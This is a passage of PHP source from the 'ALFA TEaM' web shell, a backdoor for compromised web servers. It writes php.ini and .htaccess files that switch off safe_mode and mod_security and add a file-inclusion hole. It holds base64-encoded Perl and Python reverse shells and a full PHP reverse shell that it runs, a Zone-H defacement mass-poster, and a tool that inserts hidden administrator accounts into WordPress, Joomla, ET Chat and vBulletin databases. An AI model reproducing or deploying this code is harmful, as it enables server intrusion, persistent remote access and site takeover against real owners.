1626. echo '<script>alert("htaccess for Apache is created...!")</script>';
1627. }
1628. if(!empty($_POST['alfa1'])&& isset($_POST['alfa1']))
1629. {
1630. $fil=fopen($GLOBALS['cwd']."php.ini","w");
1631. fwrite($fil,'safe_mode=OFF
1632. disable_functions=ByPass By Sole Sad & Invisible(ALFA TEaM)');
1633. fclose($fil);
1634. $file2=fopen($GLOBALS['cwd']."ini.php","w");
1635. fwrite($file2,'<?
1636. echo ini_get("safe_mode");
1637. echo ini_get("open_basedir");
1638. include($_GET["file"]);
1639. ini_restore("safe_mode");
1640. ini_restore("open_basedir");
1641. echo ini_get("safe_mode");
1642. echo ini_get("open_basedir");
1643. include($_GET["ss"]);
1644. ?>');
1645. fclose($file2);
1646. echo '<script>alert("php.ini && ini.php is created...!")</script>';
1647. }
1648. if(!empty($_POST['alfa3']) && isset($_POST['alfa3']))
1649. {
1650. $fil=fopen($GLOBALS['cwd'].".htaccess","w");
1651. fwrite($fil,'#Generated By Sole Sad and Invisible
1652. <Files *.php>
1653. ForceType application/x-httpd-php4
1654. </Files>
1655. ahm tas: <IfModule mod_security.c>
1656. SecFilterEngine Off
1657. SecFilterScanPOST Off
1658. </IfModule>');
1659. fclose($fil);
1660. echo '<script>alert("htaccess for Litespeed is created...!")</script>';
1661. }
1662. echo "<br></div>";
1663. alfafooter();
1664. }
1665. function alfaconnect()
1666. {
1667. alfahead();
1668. $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1669. $back_connect_py="IyEvdXNyL2Jpbi9weXRob24NCg0KaW1wb3J0IHN5cywgc29ja2V0LCBvcywgc3VicHJvY2Vzcw0KDQpob3N0ID0gc3lzLmFyZ3ZbMV0NCnBvcnQgPSBpbnQoc3lzLmFyZ3ZbMl0pDQoNCnNvY2tldC5zZXRkZWZhdWx0dGltZW91dCg2MCkNCg0KZGVmIGJjKCk6DQogIHRyeToNCiAgICBzb2sgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkNCiAgICBzb2suY29ubmVjdCgoaG9zdCxwb3J0KSkNCiAgICBzb2suc2VuZCgnJydzb2xldmlzaWJsZUBnbWFpbC5jb21cblxuJycnKQ0KICAgIG9zLmR1cDIoc29rLmZpbGVubygpLDApDQogICAgb3MuZHVwMihzb2suZmlsZW5vKCksMSkNCiAgICBvcy5kdXAyKHNvay5maWxlbm8oKSwyKQ0KICAgIG9zLmR1cDIoc29rLmZpbGVubygpLDMpDQogICAgc2hlbGwgPSBzdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSkNCiAgZXhjZXB0IHNvY2tldC50aW1lb3V0Og0KICAgIHByaW50ICJbIV0gQ29ubmVjdGlvbiB0aW1lZCBvdXQiDQogIGV4Y2VwdCBzb2NrZXQuZXJyb3IsIGU6DQogICAgcHJpbnQgIlshXSBFcnJvciB3aGlsZSBjb25uZWN0aW5nIiwgZQ0KICANCmJjKCk=";
1670. echo "<div class=header><center><h3><span>| Back Connect |</span></h3>";
1671. echo "<form onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\"><span><font color=\"#00A220\">PERL BACK CONNECT</font><br></span><br><font color=\"#00A220\"><b>IP: <input type='text' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' value='443'> <input type=submit value='>>'></form></b></font>";
1672. echo "<br><form onSubmit=\"g(null,null,'php',this.server.value,this.port.value);return false;\"><span>PHP BACK CONNECT<br></span><br><font color=\"#FFFFFF\"><b>IP: <input type='text' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' value='443'> <input type=submit value='>>'></form><br>";
1673. echo "<br><form onSubmit=\"g(null,null,'py',this.server.value,this.port.value);return false;\"><span><font color=\"#FF0000\">PYTHON BACK CONNECT</font><br></span><br><font color=\"#FF0000\"><b>IP: <input type='text' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' value='443'> <input type=submit value='>>'></form></center><br>";
1674. if(isset($_POST['alfa1'])) {
1675. function cf($f,$t) {
1676. $w = @fopen($f,"w") or @function_exists('file_put_contents');
1677. if($w){
1678. @fwrite($w,@base64_decode($t));
1679. @fclose($w);
1680. }
1681. }
1682. if($_POST['alfa1'] == 'bcp') {
1683. cf("/tmp/bc.pl",$back_connect_p);
1684. $out = alfaEx("perl /tmp/bc.pl ".$_POST['alfa2']." ".$_POST['alfa3']." 1>/dev/null 2>&1 &");
1685. echo "<pre class=ml1 style='margin-top:5px'>Successfully opened reverse shell to ".$_POST['alfa2'].":".$_POST['alfa3']."<br>Connecting...[Perl]</pre>";
1686. @unlink("/tmp/bc.pl");
1687. }
1688. if($_POST['alfa1'] == 'py') {
1689. cf("/tmp/bc.py",$back_connect_py);
1690. $out = alfaEx("python /tmp/bc.py ".$_POST['alfa2']." ".$_POST['alfa3']." 1>/dev/null 2>&1 &");
1691. echo "<pre class=ml1 style='margin-top:5px'>Successfully opened reverse shell to ".$_POST['alfa2'].":".$_POST['alfa3']."<br>Connecting...[Python]</pre>";
1692. @unlink("/tmp/bc.py");
1693. }
1694. if($_POST['alfa1']=='php')
1695. {
1696. @set_time_limit (0);
1697. $ip = $_POST['alfa2'];
1698. $port =$_POST['alfa3'];
1699. $chunk_size = 1400;
1700. $write_a = null;
1701. $error_a = null;
1702. $shell = 'uname -a; w; id; /bin/sh -i';
1703. $daemon = 0;
1704. $debug = 0;
1705. echo "<pre class=ml1 style='margin-top:5px'>";
1706. if (function_exists('pcntl_fork')) {
1707. $pid = pcntl_fork();
1708. if ($pid == -1) {
1709. echo "Cant fork!<br>";
1710. exit(1);
1711. }
1712. if ($pid) {
1713. exit(0);
1714. }
1715. if (posix_setsid() == -1) {
1716. echo "Error: Can't setsid()<br>";
1717. exit(1);
1718. }
1719. $daemon = 1;
1720. } else {
1721. echo "WARNING: Failed to daemonise. This is quite common and not fatal<br>";
1722. }
1723. chdir(htmlspecialchars($GLOBALS['cwd']));
1724. umask(0);
1725. $sock = fsockopen($ip, $port, $errno, $errstr, 30);
1726. if (!$sock) {
1727. echo "$errstr ($errno)";
1728. exit(1);
1729. }
1730. $descriptorspec = array(
1731. 0 => array("pipe", "r"),
1732. 1 => array("pipe", "w"),
1733. 2 => array("pipe", "w")
1734. );
1735. $process = proc_open($shell, $descriptorspec, $pipes);
1736. if (!is_resource($process)) {
1737. echo "ERROR: Can't spawn shell<br>";
1738. exit(1);
1739. }
1740. @stream_set_blocking($pipes[0], 0);
1741. @stream_set_blocking($pipes[1], 0);
1742. @stream_set_blocking($pipes[2], 0);
1743. @stream_set_blocking($sock, 0);
1744. echo "Successfully opened reverse shell to $ip:$port [Php]<br>";
1745. while (1) {
1746. if (feof($sock)) {
1747. echo "ERROR: Shell connection terminated<br>";
1748. break;
1749. }
1750. if (feof($pipes[1])) {
1751. echo "ERROR: Shell process terminated<br>";
1752. break;
1753. }
1754. $read_a = array($sock, $pipes[1], $pipes[2]);
1755. $num_changed_sockets=@stream_select($read_a, $write_a, $error_a, null);
1756. if (in_array($sock, $read_a)) {
1757. if ($debug) echo "SOCK READ<br>";
1758. $input=fread($sock, $chunk_size);
1759. if ($debug) echo "SOCK: $input<br>";
1760. fwrite($pipes[0], $input);
1761. }
1762. if (in_array($pipes[1], $read_a)) {
1763. if ($debug) echo "STDOUT READ<br>";
1764. $input = fread($pipes[1], $chunk_size);
1765. if ($debug) echo "STDOUT: $input<br>";
1766. fwrite($sock, $input);
1767. }
1768. if (in_array($pipes[2], $read_a)) {
1769. if ($debug) echo "STDERR READ<br>";
1770. $input = fread($pipes[2], $chunk_size);
1771. if ($debug) echo "STDERR: $input<br>";
1772. fwrite($sock, $input);
1773. }
1774. }
1775. fclose($sock);
1776. fclose($pipes[0]);
1777. fclose($pipes[1]);
1778. fclose($pipes[2]);
1779. proc_close($process);
1780. echo "</pre>";
1781. }
1782. }
1783. echo "</div>";
1784. alfafooter();
1785. }
1786. function ZoneH($url, $hacker, $hackmode,$reson, $site )
1787. {
1788. $k = curl_init();
1789. curl_setopt($k, CURLOPT_URL, $url);
1790. curl_setopt($k,CURLOPT_POST,true);
1791. curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
1792. curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
1793. curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
1794. $kubra = curl_exec($k);
1795. curl_close($k);
1796. return $kubra;
1797. }
1798. function alfazoneh()
1799. {
1800. alfahead();
1801. echo '<div class=header>';
1802. if(!function_exists('curl_version'))
1803. {
1804. echo "<pre class=ml1 style='margin-top:5px'><center><font color=red><b><big><big>PHP CURL NOT EXIST ~ ZONE H MASS POSTER DOES NOT WORK</b></font></big></big></center></pre>";
1805. }
1806. echo '
1807. <center><br><b><font color="#FFFF01">==</font> <font color="#00A220">ZONE-H</font> <font color="#FFFFFF">Mass</font> <font color="#FF0000">Poster</font><font color="#FFFF01"> ==</font></b><center><br>
1808. <form action="" method="post" onsubmit="g(\'zoneh\',null,this.defacer.value,this.hackmode.value,this.reason.value,this.domain.value,this.go.value); return false;">
1809. <input type="text" name="defacer" size="67" id="text" value="ALFA TEaM 2012" />
1810. <br>
1811. <select id="text" name="hackmode">
1812. <option>------------------------------------SELECT-------------------------------------</option>
1813. <option style="background-color: rgb(F, F, F);" value="1" >known vulnerability (i.e. unpatched system)</option>
1814. <option style="background-color: rgb(F, F, F);" value="2" >undisclosed (new) vulnerability</option>
1815. <option style="background-color: rgb(F, F, F);" value="3" >configuration / admin. mistake</option>
1816. <option style="background-color: rgb(F, F, F);" value="4" >brute force attack</option>
1817. <option style="background-color: rgb(F, F, F);" value="5" >social engineering</option>
1818. <option style="background-color: rgb(F, F, F);" value="6" >Web Server intrusion</option>
1819. <option style="background-color: rgb(F, F, F);" value="7" >Web Server external module intrusion</option>
1820. <option style="background-color: rgb(F, F, F);" value="8" >Mail Server intrusion</option>
1821. <option style="background-color: rgb(F, F, F);" value="9" >FTP Server intrusion</option>
1822. <option style="background-color: rgb(F, F, F);" value="10" >SSH Server intrusion</option>
1823. <option style="background-color: rgb(F, F, F);" value="11" >Telnet Server intrusion</option>
1824. <option style="background-color: rgb(F, F, F);" value="12" >RPC Server intrusion</option>
1825. <option style="background-color: rgb(F, F, F);" value="13" >Shares misconfiguration</option>
1826. <option style="background-color: rgb(F, F, F);" value="14" >Other Server intrusion</option>
1827. <option style="background-color: rgb(F, F, F);" value="15" >SQL Injection</option>
1828. <option style="background-color: rgb(F, F, F);" value="16" >URL Poisoning</option>
1829. <option style="background-color: rgb(F, F, F);" value="17" >File Inclusion</option>
1830. <option style="background-color: rgb(F, F, F);" value="18" >Other Web Application bug</option>
1831. <option style="background-color: rgb(F, F, F);" value="19" >Remote administrative panel access bruteforcing</option>
1832. <option style="background-color: rgb(F, F, F);" value="20" >Remote administrative panel access password guessing</option>
1833. <option style="background-color: rgb(F, F, F);" value="21" >Remote administrative panel access social engineering</option>
1834. <option style="background-color: rgb(F, F, F);" value="22" >Attack against administrator(password stealing/sniffing)</option>
1835. <option style="background-color: rgb(F, F, F);" value="23" >Access credentials through Man In the Middle attack</option>
1836. <option style="background-color: rgb(F, F, F);" value="24" >Remote service password guessing</option>
1837. <option style="background-color: rgb(F, F, F);" value="25" >Remote service password bruteforce</option>
1838. <option style="background-color: rgb(F, F, F);" value="26" >Rerouting after attacking the Firewall</option>
1839. <option style="background-color: rgb(F, F, F);" value="27" >Rerouting after attacking the Router</option>
1840. <option style="background-color: rgb(F, F, F);" value="28" >DNS attack through social engineering</option>
1841. <option style="background-color: rgb(F, F, F);" value="29" >DNS attack through cache poisoning</option>
1842. <option style="background-color: rgb(F, F, F);" value="30" >Not available</option>
1843. <option style="background-color: rgb(F, F, F);" value="8" >_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _</option>
1844. </select> <br>
1845. <select id="text" name="reason">
1846. <option >------------------------------------SELECT-------------------------------------</option>
1847. <option style="background-color: rgb(F, F, F);" value="1" >Heh...just for fun!</option>
1848. <option style="background-color: rgb(F, F, F);" value="2" >Revenge against that website</option>
1849. <option style="background-color: rgb(F, F, F);" value="3" >Political reasons</option>
1850. <option style="background-color: rgb(F, F, F);" value="4" >As a challenge</option>
1851. <option style="background-color: rgb(F, F, F);" value="5" >I just want to be the best defacer</option>
1852. <option style="background-color: rgb(F, F, F);" value="6" >Patriotism</option>
1853. <option style="background-color: rgb(F, F, F);" value="7" >Not available</option>
1854. option style="background-color: rgb(F, F, F);" value="8" >_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _</option>
1855. </select><br>
1856. <textarea name="domain" cols="90" rows="20" placeholder="Domains..."></textarea><br>
1857. <input type="submit" value=">>" name="go"/>
1858. </form></center>';
1859. if($_POST['alfa5'] && $_POST['alfa5'] == '>>'){
1860. ob_start();
1861. $hacker = $_POST['alfa1'];
1862. $method = $_POST['alfa2'];
1863. $neden = $_POST['alfa3'];
1864. $site = $_POST['alfa4'];
1865. if (empty($hacker))
1866. {
1867. die ("<center><b><font color =\"#FF0000\">[+] YOU MUST FILL THE ATTACKER NAME [+]</font></b></center>");
1868. }
1869. elseif($method == "------------------------------------SELECT-------------------------------------")
1870. {
1871. die("<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE METHOD [+]</b></font></center>");
1872. }
1873. elseif($neden == "------------------------------------SELECT-------------------------------------")
1874. {
1875. die("<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE REASON [+]</b></font></center>");
1876. }
1877. elseif(empty($site))
1878. {
1879. die("<center><b><font color =\"#FF0000\">[+] YOU MUST INTER THE SITES LIST [+]<font></b></center>");
1880. }
1881. $i = 0;
1882. $sites = explode("\n", $site);
1883. while($i < count($sites))
1884. {
1885. if(substr($sites[$i], 0, 4) != "http")
1886. {
1887. $sites[$i] = "http://".$sites[$i];
1888. }
1889. ZoneH("http://www.zone-h.com/notify/single", $hacker, $method, $neden, $sites[$i]);
1890. ++$i;
1891. }
1892. echo "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color =\"#00A220\"><b>[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]</b><font></center>";
1893. }
1894. echo "</div>";
1895. alfafooter();
1896. }
1897. function alfateam()
1898. {
1899. alfahead();
1900. echo "<div class=header>";
1901. echo "<pre>
1902. <center><img height=\"300\" width=\"450\" src=\"http://iran.grn.cc/alfa-iran.jpg\">
1903. <font color=\"#FFFF01\">
1904. <br>
1905. <font color=#00A220><b>Shell Coded By Sole Sad & Invisible(ALFA TEaM)Iranian Hackers :)</font><b>special thanks to MadLeets</b></font><br>
1906. <font color=#00A220>Contact : solevisible@gmail.com<br></font>
1907. <font color=#FFFFFF>Skype : ehsan.invisible</font><br>
1908. <font color=#FFFFFF><b>Skype : sole.sad</b></font><br><b>
1909. <font color=#FF0000><b>Persian Gulf For Ever</b></font><br><b>
1910.  
1911. </pre></div>";
1912. alfafooter();
1913. }
1914. function alfapwchanger(){
1915. alfahead();
1916. echo '<div class=header><script>alfa1_=alfa2_=alfa3_=alfa4_=alfa5_=alfa6_=alfa7_=alfa8_=alfa9_=alfa10_=""</script><center><h3><span>| Add New Admin |</span></h3>
1917. <center><h3>
1918. <a href=# onclick="g(\'pwchanger\',null,\'wp\')">| WordPress | </a>
1919. <a href=# onclick="g(\'pwchanger\',null,null,\'joomla\')">| Joomla | </a>
1920. <a href=# onclick="g(\'pwchanger\',null,null,null,\'etchat\')">| ET CHAT | </a>
1921. <a href=# onclick="g(\'pwchanger\',null,null,null,null,\'vb\')">| vBulletin | </a>
1922. <a href=# onclick="g(\'pwchanger\',null,null,null,null,null,\'phpbb\')">| phpBB | </a>
1923. <a href=# onclick="g(\'pwchanger\',null,null,null,null,null,null,\'whmcs\')">| whmcs | </a>
1924. <a href=# onclick="g(\'pwchanger\',null,null,null,null,null,null,null,\'mybb\')">| MyBB | </a>
1925. <a href=# onclick="g(\'pwchanger\',null,null,null,null,null,null,null,null,\'nuke\')">| Php Nuke | </a>
1926. </h3></center>';
1927. if ($_POST['alfa1'] && $_POST['alfa1']== 'wp'){
1928. echo '<b><center><script>alfa2_=alfa3_=alfa4_=alfa5_=alfa6_=alfa7_=alfa8_=alfa9_=alfa10_=""</script>
1929. <center><b><font color="#FFFF01">==</font> <font color="#00A220">Add</font> <font color="#FFFFFF">NewAdmin</font> <font color="#FF0000">WordPress</font><font color="#FFFF01"> ==</font></b><p>
1930. <FORM onSubmit="g(\'pwchanger\',null,\'wp\',this.send.value,this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">
1931. <table border=1>
1932. <tr><td><font color=#FFFFFF>Host :</td>
1933. <td><INPUT size="30" value="localhost" name="localhost" type="text"></td></tr>
1934. <tr><td><font color=#FFFFFF>Database :</td>
1935. <td> <INPUT size="30" value="" name="database" type="text"></td></tr>
1936. <tr><td><font color=#FFFFFF>Table Prefix :</td>
1937. <td><INPUT size="30" value="wp_" name="prefix" type="text"></td></tr>
1938. <tr><td><font color=#FFFFFF>Username : </td>
1939. <td> <INPUT size="30" value="" name="username" type="text"></td></tr>
1940. <tr><td><font color=#FFFFFF>Password :</td>
1941. <td> <INPUT size="30" value="" name="password" type="text"></td></tr>
1942. <tr><td><font color=#FF0000>Admin Username:</td>
1943. <td><INPUT name="admin" size="30" value="admin"></td></tr>
1944. <tr><td><font color=#FF0000>Admin Password: </td>
1945. <td><INPUT name="kh" size="30" value="solevisible" disabled /></td></tr>
1946. <tr><td><font color=#FF0000>Admin Email:</td>
1947. <td><INPUT name="email" size="30" value="solevisible@fbi.gov"></td></tr>
1948. </table>
1949. <INPUT value=">>" name="send" type="submit">
1950. </FORM></b>';
1951. if ($_POST['alfa2'] && $_POST['alfa2'] == '>>'){
1952. $localhost = $_POST['alfa3'];
1953. $database = $_POST['alfa4'];
1954. $username = $_POST['alfa5'];
1955. $password = $_POST['alfa6'];
1956. $admin = $_POST['alfa8'];
1957. $SQL = $_POST['alfa9'];
1958. $prefix = $_POST['alfa10'];
1959. @mysql_connect($localhost,$username,$password) or die(mysql_error());
1960. @mysql_select_db($database) or die(mysql_error());
1961. $solevisible=@mysql_query("insert into ".$prefix."users (ID,user_login,user_pass,user_email) values(null,'$admin','d4a590caacc0be55ef286e40a945ea45','$SQL')") or die(mysql_error());
1962. $solevisible=@mysql_query("select ID from ".$prefix."users where user_login='".$admin."'") or die(mysql_error());
1963. $sole = mysql_num_rows($solevisible);
1964. if ($sole == 1){
1965. $solevis = mysql_fetch_assoc($solevisible);
1966. $res = $solevis['ID'];
1967. }
1968. $solevisible=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','first_name','solevisible')") or die(mysql_error());
1969. $solevisible=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','last_name','solevisible')") or die(mysql_error());
1970. $solevisible=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','nickname','solevisible')") or die(mysql_error());
1971. $solevisible=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','description','solevisible')") or die(mysql_error());
1972. $solevisible=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','rich_editing','true')") or die(mysql_error());
1973. $solevisible=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','comment_shortcuts','false')") or die(mysql_error());
1974. $solevisible=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','admin_color','fresh')") or die(mysql_error());
1975. $solevisible=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','use_ssl','0')") or die(mysql_error());
1976. $solevisible=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','show_admin_bar_front','true')") or die(mysql_error());
1977. $solevisible=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','wp_capabilities','a:1:{s:13:\"administrator\";b:1;}')") or die(mysql_error());
1978. $solevisible=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','wp_user_level','10')") or die(mysql_error());
1979. $solevisible=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','dismissed_wp_pointers','wp330_toolbar,wp330_saving_widgets,wp340_choose_image_from_library,wp340_customize_current_theme_link,wp350_media')") or die(mysql_error());
1980. $solevisible=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','show_welcome_panel','1')") or die(mysql_error());
1981. $solevisible=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','wp_dashboard_quick_press_last_post_id','3')") or die(mysql_error());
1982. if($solevisible){
1983. echo "<center><br><b><script>alert('Success... ".$admin." is created :)')</script></b></center> "; }
1984. }
1985. }
1986. if ($_POST['alfa2'] && $_POST['alfa2'] == 'joomla' ){
1987. echo '<script>alfa1_=alfa3_=alfa4_=alfa5_=alfa6_=alfa7_=alfa8_=alfa9_=alfa10_=""</script>
1988. <b><center><FORM onSubmit="g(\'pwchanger\',null,this.send.value,\'joomla\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">
1989. <center><b><font color="#FFFF01">==</font> <font color="#00A220">Add</font> <font color="#FFFFFF">NewAdmin</font> <font color="#FF0000">Joomla</font><font color="#FFFF01"> ==</font></b>
1990. <p><table border=1>
1991. <tr><td><font color=#FFFFFF> host :</td>
1992. <td><INPUT size="30" value="localhost" name="localhost" type="text"></td></tr>
1993. <tr><td><font color=#FFFFFF>database: </td>
1994. <td><INPUT size="30" value="" name="database" type="text"></td></tr>
1995. <tr><td><font color=#FFFFFF>Table Prefix :</td>
1996. <td><INPUT size="30" value="jos_" name="prefix" type="text"></td></tr>
1997. <tr><td><font color=#FFFFFF>username : </td>
1998. <td> <INPUT size="30" value="" name="username" type="text"></td></tr>
1999. <tr><td><font color=#FFFFFF>password : </td>
2000. <td> <INPUT size="30" value="" name="password" type="text"></td></tr>
2001. <tr><td><font color=#FF0000>Admin username:</td>
2002. <td><INPUT name="admin" size="30" value="admin"></td></tr>
2003. <tr><td><font color=#FF0000>Admin Password :<font color="#FFFFFF"></td>
2004. <td><INPUT name="toftof" size="30" value="solevisible" disabled/></td></tr>
2005. <tr><td><font color=#FF0000>Admin Email:</td>
2006. <td> <INPUT name="email" size="30" value="solevisible@fbi.gov"></td></tr>
2007. </table>
2008. <INPUT value=">>" name="send" type="submit">
2009. </FORM></center></b>';
2010. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
2011. $localhost = $_POST['alfa3'];
2012. $database = $_POST['alfa4'];
2013. $username = $_POST['alfa5'];
2014. $password = $_POST['alfa6'];
2015. $admin = $_POST['alfa8'];
2016. $SQL = $_POST['alfa9'];
2017. $prefix = $_POST['alfa10'];
2018. @mysql_connect($localhost,$username,$password) or die(mysql_error());
2019. @mysql_select_db($database) or die(mysql_error());
2020. $solevisible=@mysql_query("insert into ".$prefix."users (id,name,username,email,password) values(null,'Super User','".$admin."','".$SQL."','d4a590caacc0be55ef286e40a945ea45')") or die(mysql_error());
2021. $solevisible=@mysql_query("select id from ".$prefix."users where username='".$admin."'") or die(mysql_error());
2022. $sole = mysql_num_rows($solevisible);
2023. if ($sole == 1){
2024. $solevis = mysql_fetch_assoc($solevisible);
2025. $res = $solevis['id'];
2026. }
2027. $solevisible=@mysql_query("INSERT INTO ".$prefix."user_usergroup_map (user_id,group_id) VALUES ('".$res."', '8')") or die(mysql_error());
2028. if($solevisible){
2029. echo "<center><br><b><script>alert('Success... ".$admin." is created :)')</script></b></center> "; }
2030. }
2031. }
2032. if ($_POST['alfa3'] && $_POST['alfa3'] == 'etchat'){
2033. echo '<script>alfa1_=alfa2_=alfa4_=alfa5_=alfa6_=alfa7_=alfa8_=alfa9_=alfa10_=""</script>
2034. <b><center> <FORM onSubmit="g(\'pwchanger\',null,this.send.value,this.localhost.value,\'etchat\',this.database.value,this.username.value,this.password.value,null,this.admin.value,null); return false;" method="POST">
2035. <b><font color="#FFFF01">==</font> <font color="#00A220">Add</font> <font color="#FFFFFF">NewAdmin</font> <font color="#FF0000">Etchat</font><font color="#FFFF01"> ==</font></b>
2036. <p><table border=1>
2037. <tr><td><font color=#FFFFFF> host :</td>
2038. <td><INPUT size="30" value="localhost" name="localhost" type="text"></td></tr>
2039. <tr><td><font color=#FFFFFF>database: </td>
2040. <td><INPUT size="30" value="" name="database" type="text"></td></tr>
2041. <tr><td><font color=#FFFFFF>username : </td>
2042. <td> <INPUT size="30" value="" name="username" type="text"></td></tr>
2043. <tr><td><font color=#FFFFFF>password : </td>
2044. <td> <INPUT size="30" value="" name="password" type="text"></td></tr>
2045. <tr><td><font color=#FF0000>Admin username:</td>
2046. <td><INPUT name="admin" size="30" value="admin"></td></tr>
2047. <tr><td><font color=#FF0000>Admin Password :<font color="#FFFFFF"></td>
2048. <td><INPUT name="toftof" size="30" value="solevisible" disabled/></td></tr>
2049. </table>
2050. <INPUT value=">>" name="send" type="submit">
2051. </FORM></center></b>';
2052. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
2053. $localhost = $_POST['alfa2'];
2054. $database = $_POST['alfa4'];
2055. $username = $_POST['alfa5'];
2056. $password = $_POST['alfa6'];
2057. $admin = $_POST['alfa8'];
2058. @mysql_connect($localhost,$username,$password) or die(mysql_error());
2059. @mysql_select_db($database) or die(mysql_error());
2060. $solevisible=@mysql_query("insert into db1_etchat_user (etchat_user_id,etchat_username,etchat_userpw,etchat_userprivilegien) values(null,'$admin','d4a590caacc0be55ef286e40a945ea45','admin')") or die(mysql_error());
2061. if($solevisible){
2062. echo "<center><br><b><script>alert('Success... ".$admin." is created :)')</script></b></center> "; }
2063. }
2064. }
2065. if ($_POST['alfa4'] && $_POST['alfa4'] == 'vb'){
2066. echo '<script>alfa1_=alfa2_=alfa3_=alfa5_=alfa6_=alfa7_=alfa8_=alfa9_=alfa10_=""</script>
2067. <b><center><FORM onSubmit="g(\'pwchanger\',null,this.send.value,this.localhost.value,this.database.value,\'vb\',this.username.value,this.password.value,this.prefix.value,this.admin.value,this.email.value); return false;" method="POST">
2068. <center><b><b><font color="#FFFF01">==</font> <font color="#00A220">Add</font> <font color="#FFFFFF">NewAdmin</font> <font color="#FF0000">vBulletin</font><font color="#FFFF01"> ==</font></b><p> <table border=1>
2069. <tr><td><font color="#FFFFFF">host :</font></td>
2070. <td><INPUT size="30" value="localhost" name="localhost" type="text"></td></tr>
2071. <tr><td><font color="#FFFFFF">database :</font></td>
2072. <td> <INPUT size="30" value="" name="database" type="text"></td></tr>
2073. <tr><td><font color="#FFFFFF">username :</font></td>
2074. <td><INPUT size="30" value="" name="username" type="text"></td></tr>
2075. <tr><td><font color="#FFFFFF">password :</font></td>
2076. <td><INPUT size="30" value="" name="password" type="text"></td></tr>
2077. <tr><td><font color="#FFFFFF">Prefix : </font></td>
2078. <td><INPUT name="prefix" size="30" value="" /></td></tr>
2079. <tr><td><font color="#FF0000">Admin username:</font></td>
2080. <td><INPUT name="admin" size="30" value="admin"></td></tr>
2081. <tr><td><font color="#FF0000">Admin Password : </font></td>
2082. <td><INPUT name="hi" size="30" value="solevisible" disabled/></td></tr>
2083. <tr><td><font color="#FF0000">Admin Email : </font></td>
2084. <td><INPUT name="email" size="30" value="solevisible@fbi.gov"> </td></tr>
2085. </table>
2086. <INPUT value=">>" name="send" type="submit">
2087. </FORM>
2088. </b></center>';
2089. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
2090. $localhost = $_POST['alfa2'];
2091. $database = $_POST['alfa3'];
2092. $username = $_POST['alfa5'];
2093. $password = $_POST['alfa6'];
2094. $prefix = $_POST['alfa7'];
2095. $admin = $_POST['alfa8'];
2096. $SQL = $_POST['alfa9'];
2097. @mysql_connect($localhost,$username,$password) or die(mysql_error());
2098. @mysql_select_db($database) or die(mysql_error());
